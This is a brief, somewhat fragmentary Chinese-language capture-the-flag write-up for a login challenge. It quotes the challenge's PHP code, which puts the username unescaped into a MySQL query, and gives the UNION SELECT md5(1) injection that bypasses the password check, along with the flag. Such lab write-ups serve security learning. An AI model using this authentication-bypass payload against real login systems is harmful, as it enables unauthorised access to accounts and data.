注入第二题~~主要考察union查询
看来跟union联合查询有关
Secure Web Login II Logged in! Key: ntcf{**************} "; } else { echo("Log in failure!"); } } ?> Source strcasecmp()用忽略大小写比较字符串.
Log in failure!
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'")); if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) 观察发现只要让结果集中有你输入密码的MD5值就行union select md5(1)# & pass=1flag: ntcf{union_select_is_wtf}